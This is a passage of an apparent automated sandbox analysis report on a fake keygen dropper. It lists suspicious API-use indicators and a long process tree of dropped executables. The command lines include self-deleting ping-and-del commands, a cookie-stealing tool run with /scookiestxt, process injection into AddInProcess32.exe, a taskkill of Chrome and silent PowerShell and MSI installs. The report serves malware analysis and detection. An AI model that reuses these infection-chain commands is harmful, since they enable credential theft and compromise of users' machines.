SeIncreaseQuotaPrivilege 2724 svchost.exe Token: SeSecurityPrivilege 2724 svchost.exe Token: SeTakeOwnershipPrivilege 2724 svchost.exe Token: SeLoadDriverPrivilege 2724 svchost.exe Token: SeSystemtimePrivilege 2724 svchost.exe Token: SeBackupPrivilege 2724 svchost.exe Token: SeRestorePrivilege 2724 svchost.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1788 ultramediaburner.tmp 6944 installer.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2276 xiuhuali.exe 2276 xiuhuali.exe 4664 MicrosoftEdge.exe 4872 MicrosoftEdgeCP.exe 4872 MicrosoftEdgeCP.exe 4988 cmd.exe 4988 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2016 wrote to memory of 2276 2016 keygen-step-4d.exe 76 PID 2016 wrote to memory of 2276 2016 keygen-step-4d.exe 76 PID 2016 wrote to memory of 2276 2016 keygen-step-4d.exe 76 PID 2276 wrote to memory of 1276 2276 xiuhuali.exe 78 PID 2276 wrote to memory of 1276 2276 xiuhuali.exe 78 PID 2276 wrote to memory of 1276 2276 xiuhuali.exe 78 PID 2016 wrote to memory of 196 2016 keygen-step-4d.exe 79 PID 2016 wrote to memory of 196 2016 keygen-step-4d.exe 79 PID 1276 wrote to memory of 2256 1276 rundll32.exe 70 PID 1276 wrote to memory of 2852 1276 rundll32.exe 34 PID 2256 wrote to memory of 4000 2256 svchost.exe 80 PID 2256 wrote to memory of 4000 2256 svchost.exe 80 PID 2256 wrote to memory of 4000 2256 svchost.exe 80 PID 1276 wrote to memory of 68 1276 rundll32.exe 60 PID 1276 wrote to memory of 2432 1276 rundll32.exe 20 PID 1276 wrote to memory of 2424 1276 rundll32.exe 40 PID 1276 wrote to memory of 1064 1276 rundll32.exe 57 PID 1276 wrote to memory of 676 1276 rundll32.exe 58 PID 1276 wrote to memory of 1404 1276 rundll32.exe 13 PID 1276 wrote to memory of 1820 1276 rundll32.exe 47 PID 1276 wrote to memory of 1184 1276 rundll32.exe 55 PID 1276 wrote to memory of 1224 1276 rundll32.exe 54 PID 1276 wrote to memory of 2724 1276 rundll32.exe 35 PID 1276 wrote to memory of 2740 1276 rundll32.exe 22 PID 2016 wrote to memory of 804 2016 keygen-step-4d.exe 83 PID 2016 wrote to memory of 804 2016 keygen-step-4d.exe 83 PID 2016 wrote to memory of 804 2016 keygen-step-4d.exe 83 PID 804 wrote to memory of 732 804 Install.exe 84 PID 804 wrote to memory of 732 804 Install.exe 84 PID 804 wrote to memory of 732 804 Install.exe 84 PID 2256 wrote to memory of 3056 2256 svchost.exe 85 PID 2256 wrote to memory of 3056 2256 svchost.exe 85 PID 2256 wrote to memory of 3056 2256 svchost.exe 85 PID 732 wrote to memory of 3984 732 Install.tmp 87 PID 732 wrote to memory of 3984 732 Install.tmp 87 PID 3984 wrote to memory of 8 3984 Ultra.exe 89 PID 3984 wrote to memory of 8 3984 Ultra.exe 89 PID 3984 wrote to memory of 8 3984 Ultra.exe 89 PID 8 wrote to memory of 1788 8 ultramediaburner.exe 90 PID 8 wrote to memory of 1788 8 ultramediaburner.exe 90 PID 8 wrote to memory of 1788 8 ultramediaburner.exe 90 PID 3984 wrote to memory of 2324 3984 Ultra.exe 91 PID 3984 wrote to memory of 2324 3984 Ultra.exe 91 PID 1788 wrote to memory of 4052 1788 ultramediaburner.tmp 92 PID 1788 wrote to memory of 4052 1788 ultramediaburner.tmp 92 PID 3984 wrote to memory of 3356 3984 Ultra.exe 93 PID 3984 wrote to memory of 3356 3984 Ultra.exe 93 PID 2016 wrote to memory of 4152 2016 keygen-step-4d.exe 95 PID 2016 wrote to memory of 4152 2016 keygen-step-4d.exe 95 PID 2016 wrote to memory of 4152 2016 keygen-step-4d.exe 95 PID 4152 wrote to memory of 4596 4152 filee.exe 99 PID 4152 wrote to memory of 4596 4152 filee.exe 99 PID 4152 wrote to memory of 4596 4152 filee.exe 99 PID 4596 wrote to memory of 4720 4596 cmd.exe 101 PID 4596 wrote to memory of 4720 4596 cmd.exe 101 PID 4596 wrote to memory of 4720 4596 cmd.exe 101 PID 2016 wrote to memory of 5116 2016 keygen-step-4d.exe 103 PID 2016 wrote to memory of 5116 2016 keygen-step-4d.exe 103 PID 2016 wrote to memory of 5116 2016 keygen-step-4d.exe 103 PID 4872 wrote to memory of 4628 4872 MicrosoftEdgeCP.exe 105 PID 4872 wrote to memory of 4628 4872 MicrosoftEdgeCP.exe 105 PID 4872 wrote to memory of 4628 4872 MicrosoftEdgeCP.exe 105 PID 4872 wrote to memory of 4628 4872 MicrosoftEdgeCP.exe 105 PID 4872 wrote to memory of 3984 4872 MicrosoftEdgeCP.exe 104
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1404
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2432
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2740
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2852
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1820
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1224
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1184
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1064
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:676
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:68
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1276
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:196
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Users\Admin\AppData\Local\Temp\is-L8GN1.tmp\Install.tmp"C:\Users\Admin\AppData\Local\Temp\is-L8GN1.tmp\Install.tmp" /SL5="$800FE,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Users\Admin\AppData\Local\Temp\is-GE1DS.tmp\Ultra.exe"C:\Users\Admin\AppData\Local\Temp\is-GE1DS.tmp\Ultra.exe" /S /UID=burnerch14⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Program Files\Windows Media Player\UWGLYGLAGR\ultramediaburner.exe"C:\Program Files\Windows Media Player\UWGLYGLAGR\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Users\Admin\AppData\Local\Temp\is-SDIPP.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-SDIPP.tmp\ultramediaburner.tmp" /SL5="$401D6,281924,62464,C:\Program Files\Windows Media Player\UWGLYGLAGR\ultramediaburner.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu7⤵
- Executes dropped EXE
PID:4052
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\59-f572b-c6b-635ae-e06a5e3cf44da\Joqypaezhyzhu.exe"C:\Users\Admin\AppData\Local\Temp\59-f572b-c6b-635ae-e06a5e3cf44da\Joqypaezhyzhu.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
C:\Users\Admin\AppData\Local\Temp\01-75a93-074-fd1b2-1c27eb30b14bc\Saevyfolaedo.exe"C:\Users\Admin\AppData\Local\Temp\01-75a93-074-fd1b2-1c27eb30b14bc\Saevyfolaedo.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3356 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n3yhbmxc.jz1\sskiper.exe /s & exit6⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\n3yhbmxc.jz1\sskiper.exeC:\Users\Admin\AppData\Local\Temp\n3yhbmxc.jz1\sskiper.exe /s7⤵
- Executes dropped EXE
PID:5800 -
C:\Users\Admin\AppData\Local\Temp\1211179992.exeC:\Users\Admin\AppData\Local\Temp\1211179992.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7368 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe9⤵PID:4100
-
-
-
C:\Users\Admin\AppData\Local\Temp\514700520.exeC:\Users\Admin\AppData\Local\Temp\514700520.exe8⤵
- Executes dropped EXE
PID:6916
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\n3yhbmxc.jz1\sskiper.exe & exit8⤵PID:6940
-
C:\Windows\SysWOW64\PING.EXEping 09⤵
- Runs ping.exe
PID:1012
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lvxpklpd.qs3\KiffMainE1.exe & exit6⤵PID:6804
-
C:\Users\Admin\AppData\Local\Temp\lvxpklpd.qs3\KiffMainE1.exeC:\Users\Admin\AppData\Local\Temp\lvxpklpd.qs3\KiffMainE1.exe7⤵
- Executes dropped EXE
PID:7120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eh30114x.sgg\001.exe & exit6⤵PID:7848
-
C:\Users\Admin\AppData\Local\Temp\eh30114x.sgg\001.exeC:\Users\Admin\AppData\Local\Temp\eh30114x.sgg\001.exe7⤵
- Executes dropped EXE
PID:8168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pp3gijba.bbj\installer.exe /qn CAMPAIGN="654" & exit6⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\pp3gijba.bbj\installer.exeC:\Users\Admin\AppData\Local\Temp\pp3gijba.bbj\installer.exe /qn CAMPAIGN="654"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6944 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pp3gijba.bbj\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pp3gijba.bbj\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619883643 /qn CAMPAIGN=""654"" " CAMPAIGN="654"8⤵PID:6052
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ghfvqyq.b1n\gpooe.exe & exit6⤵PID:7788
-
C:\Users\Admin\AppData\Local\Temp\0ghfvqyq.b1n\gpooe.exeC:\Users\Admin\AppData\Local\Temp\0ghfvqyq.b1n\gpooe.exe7⤵
- Executes dropped EXE
PID:7940 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:4836
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:6768
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lxzyisqc.pb4\sskiper.exe /s & exit6⤵PID:6264
-
C:\Users\Admin\AppData\Local\Temp\lxzyisqc.pb4\sskiper.exeC:\Users\Admin\AppData\Local\Temp\lxzyisqc.pb4\sskiper.exe /s7⤵
- Executes dropped EXE
PID:6892 -
C:\Users\Admin\AppData\Local\Temp\1811090661.exeC:\Users\Admin\AppData\Local\Temp\1811090661.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5784 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe9⤵PID:8140
-
-
-
C:\Users\Admin\AppData\Local\Temp\2069423122.exeC:\Users\Admin\AppData\Local\Temp\2069423122.exe8⤵
- Executes dropped EXE
PID:7380
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\lxzyisqc.pb4\sskiper.exe & exit8⤵PID:9428
-
C:\Windows\SysWOW64\PING.EXEping 09⤵
- Runs ping.exe
PID:1748
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mysv1bk3.gco\google-game.exe & exit6⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\mysv1bk3.gco\google-game.exeC:\Users\Admin\AppData\Local\Temp\mysv1bk3.gco\google-game.exe7⤵PID:4988
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install8⤵
- Loads dropped DLL
PID:4104
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2pgikbvd.zua\askinstall39.exe & exit6⤵PID:7448
-
C:\Users\Admin\AppData\Local\Temp\2pgikbvd.zua\askinstall39.exeC:\Users\Admin\AppData\Local\Temp\2pgikbvd.zua\askinstall39.exe7⤵
- Executes dropped EXE
PID:7604 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe8⤵PID:6356
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe9⤵
- Kills process with taskkill
PID:6504
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jz4odq2u.2cy\y1.exe & exit6⤵PID:7832
-
C:\Users\Admin\AppData\Local\Temp\jz4odq2u.2cy\y1.exeC:\Users\Admin\AppData\Local\Temp\jz4odq2u.2cy\y1.exe7⤵
- Executes dropped EXE
PID:6000 -
C:\Users\Admin\AppData\Local\Temp\boeEpNZeIy.exe"C:\Users\Admin\AppData\Local\Temp\boeEpNZeIy.exe"8⤵PID:5696
-
C:\Users\Admin\AppData\Roaming\1620143007223.exe"C:\Users\Admin\AppData\Roaming\1620143007223.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620143007223.txt"9⤵PID:6228
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\boeEpNZeIy.exe"9⤵PID:5836
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 310⤵
- Runs ping.exe
PID:8148
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\jz4odq2u.2cy\y1.exe"8⤵PID:7352
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK9⤵
- Delays execution with timeout.exe
PID:4832
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ylqhbre4.b3w\setup.exe & exit6⤵PID:6736
-
C:\Users\Admin\AppData\Local\Temp\ylqhbre4.b3w\setup.exeC:\Users\Admin\AppData\Local\Temp\ylqhbre4.b3w\setup.exe7⤵
- Executes dropped EXE
PID:5520 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ylqhbre4.b3w\setup.exe"8⤵PID:4392
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30009⤵
- Runs ping.exe
PID:5656
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\43wmy2jm.5om\toolspab1.exe & exit6⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\43wmy2jm.5om\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\43wmy2jm.5om\toolspab1.exe7⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\43wmy2jm.5om\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\43wmy2jm.5om\toolspab1.exe8⤵PID:5024
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\agivtdwz.jnr\GcleanerWW.exe /mixone & exit6⤵PID:5824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fgvqx0gp.f0x\SunLabsPlayer.exe /S & exit6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4988 -
C:\Users\Admin\AppData\Local\Temp\fgvqx0gp.f0x\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\fgvqx0gp.f0x\SunLabsPlayer.exe /S7⤵PID:6136
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn251F.tmp\tempfile.ps1"8⤵PID:7560
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn251F.tmp\tempfile.ps1"8⤵PID:3844
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ozl1v2q1.jnm\005.exe & exit6⤵PID:6188
-
C:\Users\Admin\AppData\Local\Temp\ozl1v2q1.jnm\005.exeC:\Users\Admin\AppData\Local\Temp\ozl1v2q1.jnm\005.exe7⤵PID:4372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\12qkjxgu.aju\Setup3310.exe /Verysilent /subid=623 & exit6⤵PID:6644
-
C:\Users\Admin\AppData\Local\Temp\12qkjxgu.aju\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\12qkjxgu.aju\Setup3310.exe /Verysilent /subid=6237⤵PID:7000
-
C:\Users\Admin\AppData\Local\Temp\is-U80JE.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-U80JE.tmp\Setup3310.tmp" /SL5="$301DE,138429,56832,C:\Users\Admin\AppData\Local\Temp\12qkjxgu.aju\Setup3310.exe" /Verysilent /subid=6238⤵PID:7028
-
C:\Users\Admin\AppData\Local\Temp\is-974U7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-974U7.tmp\Setup.exe" /Verysilent9⤵PID:5928
-
C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe"C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe"10⤵PID:7876
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵PID:6028
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵PID:6868
-
-
-
C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"10⤵PID:6752
-
C:\Users\Admin\AppData\Local\Temp\is-D9FO8.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-D9FO8.tmp\LabPicV3.tmp" /SL5="$20498,506127,422400,C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"11⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\is-LMH2H.tmp\3316505.exe"C:\Users\Admin\AppData\Local\Temp\is-LMH2H.tmp\3316505.exe" /S /UID=lab21412⤵PID:5412
-
C:\Program Files\Windows Photo Viewer\TKTVDABJQJ\prolab.exe"C:\Program Files\Windows Photo Viewer\TKTVDABJQJ\prolab.exe" /VERYSILENT13⤵PID:4888
-
-
C:\Users\Admin\AppData\Local\Temp\2a-bbd13-bbd-0f59b-e8508c4afbf32\Pyxolugahe.exe"C:\Users\Admin\AppData\Local\Temp\2a-bbd13-bbd-0f59b-e8508c4afbf32\Pyxolugahe.exe"13⤵PID:4692
-
-
C:\Users\Admin\AppData\Local\Temp\34-e612f-1f9-db0bc-e2dc8d21a6532\Romedikina.exe"C:\Users\Admin\AppData\Local\Temp\34-e612f-1f9-db0bc-e2dc8d21a6532\Romedikina.exe"13⤵PID:5756
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mflx1cp3.r33\sskiper.exe /s & exit14⤵PID:6344
-
C:\Users\Admin\AppData\Local\Temp\mflx1cp3.r33\sskiper.exeC:\Users\Admin\AppData\Local\Temp\mflx1cp3.r33\sskiper.exe /s15⤵PID:8708
-
C:\Users\Admin\AppData\Local\Temp\1139836490.exeC:\Users\Admin\AppData\Local\Temp\1139836490.exe16⤵PID:9424
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe17⤵PID:9680
-
-
-
C:\Users\Admin\AppData\Local\Temp\2045300393.exeC:\Users\Admin\AppData\Local\Temp\2045300393.exe16⤵PID:7180
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2julaefz.4tk\KiffMainE1.exe & exit14⤵PID:6188
-
C:\Users\Admin\AppData\Local\Temp\2julaefz.4tk\KiffMainE1.exeC:\Users\Admin\AppData\Local\Temp\2julaefz.4tk\KiffMainE1.exe15⤵PID:9092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fucpcnia.fco\001.exe & exit14⤵PID:7812
-
C:\Users\Admin\AppData\Local\Temp\fucpcnia.fco\001.exeC:\Users\Admin\AppData\Local\Temp\fucpcnia.fco\001.exe15⤵PID:8252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eetxxper.oza\installer.exe /qn CAMPAIGN="654" & exit14⤵PID:8340
-
C:\Users\Admin\AppData\Local\Temp\eetxxper.oza\installer.exeC:\Users\Admin\AppData\Local\Temp\eetxxper.oza\installer.exe /qn CAMPAIGN="654"15⤵PID:8536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cmedepge.5rb\gpooe.exe & exit14⤵PID:8648
-
C:\Users\Admin\AppData\Local\Temp\cmedepge.5rb\gpooe.exeC:\Users\Admin\AppData\Local\Temp\cmedepge.5rb\gpooe.exe15⤵PID:7676
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt16⤵PID:9560
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt16⤵PID:7176
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cpy5v1oq.5f0\sskiper.exe /s & exit14⤵PID:8272
-
C:\Users\Admin\AppData\Local\Temp\cpy5v1oq.5f0\sskiper.exeC:\Users\Admin\AppData\Local\Temp\cpy5v1oq.5f0\sskiper.exe /s15⤵PID:7768
-
C:\Users\Admin\AppData\Local\Temp\1882107100.exeC:\Users\Admin\AppData\Local\Temp\1882107100.exe16⤵PID:9948
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe17⤵PID:9332
-
-
-
C:\Users\Admin\AppData\Local\Temp\1910765448.exeC:\Users\Admin\AppData\Local\Temp\1910765448.exe16⤵PID:6776
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qytj2u5n.xiv\google-game.exe & exit14⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\qytj2u5n.xiv\google-game.exeC:\Users\Admin\AppData\Local\Temp\qytj2u5n.xiv\google-game.exe15⤵PID:9736
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install16⤵PID:10056
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g0ltww3p.3fb\askinstall39.exe & exit14⤵PID:8928
-
C:\Users\Admin\AppData\Local\Temp\g0ltww3p.3fb\askinstall39.exeC:\Users\Admin\AppData\Local\Temp\g0ltww3p.3fb\askinstall39.exe15⤵PID:10236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ufxkhqv0.cep\y1.exe & exit14⤵PID:8460
-
C:\Users\Admin\AppData\Local\Temp\ufxkhqv0.cep\y1.exeC:\Users\Admin\AppData\Local\Temp\ufxkhqv0.cep\y1.exe15⤵PID:8232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bmx21bzu.4uu\setup.exe & exit14⤵PID:9516
-
C:\Users\Admin\AppData\Local\Temp\bmx21bzu.4uu\setup.exeC:\Users\Admin\AppData\Local\Temp\bmx21bzu.4uu\setup.exe15⤵PID:2372
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\bmx21bzu.4uu\setup.exe"16⤵PID:7656
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300017⤵
- Runs ping.exe
PID:9732
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e30rgsly.iiy\toolspab1.exe & exit14⤵PID:9608
-
C:\Users\Admin\AppData\Local\Temp\e30rgsly.iiy\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\e30rgsly.iiy\toolspab1.exe15⤵PID:9708
-
C:\Users\Admin\AppData\Local\Temp\e30rgsly.iiy\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\e30rgsly.iiy\toolspab1.exe16⤵PID:9028
-
-
-
-
